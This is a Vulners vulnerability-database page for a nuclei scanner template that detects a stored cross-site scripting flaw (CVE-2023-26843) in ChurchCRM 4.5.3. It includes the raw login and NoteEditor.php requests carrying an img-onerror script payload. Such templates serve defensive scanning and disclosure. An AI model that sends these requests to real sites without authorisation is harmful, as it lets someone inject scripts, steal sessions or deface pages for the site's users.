Lucene search
K

ChurchCRM 4.5.3 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

ChurchCRM 4.5.3 - Stored Cross-Site Scripting vulnerability allows remote injection of malicious scripts via NoteEditor.php, potentially leading to data theft or session hijacking

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-26843
25 Jan 202414:31
circl
CNNVD
ChurchCRM 跨站脚本漏洞
25 Apr 202300:00
cnnvd
CVE
CVE-2023-26843
25 Apr 202300:00
cve
Cvelist
CVE-2023-26843
25 Apr 202300:00
cvelist
NVD
CVE-2023-26843
25 Apr 202313:15
nvd
OSV
CVE-2023-26843
25 Apr 202313:15
osv
Prion
Cross site scripting
25 Apr 202313:15
prion
Positive Technologies
PT-2023-20819 · Churchcrm · Churchcrm
25 Apr 202300:00
ptsecurity
RedhatCVE
CVE-2023-26843
23 May 202503:15
redhatcve
Vulnrichment
CVE-2023-26843
25 Apr 202300:00
vulnrichment
Rows per page
id: CVE-2023-26843

info:
  name: ChurchCRM 4.5.3 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the NoteEditor.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-26843
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26843
    - https://github.com/ChurchCRM/CRM
    - https://github.com/10splayaSec/CVE-Disclosures
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-26843
    cwe-id: CWE-79
    epss-score: 0.0142
    epss-percentile: 0.69608
    cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: churchcrm
    product: churchcrm
  tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated,vuln

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}
      - |
        POST /NoteEditor.php?FamilyID=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        PersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "><img src=x onerror=alert(document.domain)>")'
          - 'contains(body_2, "ChurchCRM")'
        condition: and
# digest: 4b0a00483046022100b8adbff45d5fc55d0505300ca1b6875a732b548a22066381799f230871bb2630022100e66fe79357093e381274ff4275e56b953925322c4684f789108f4f657b8f8d1a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.15.4
EPSS0.0142
SSVC
31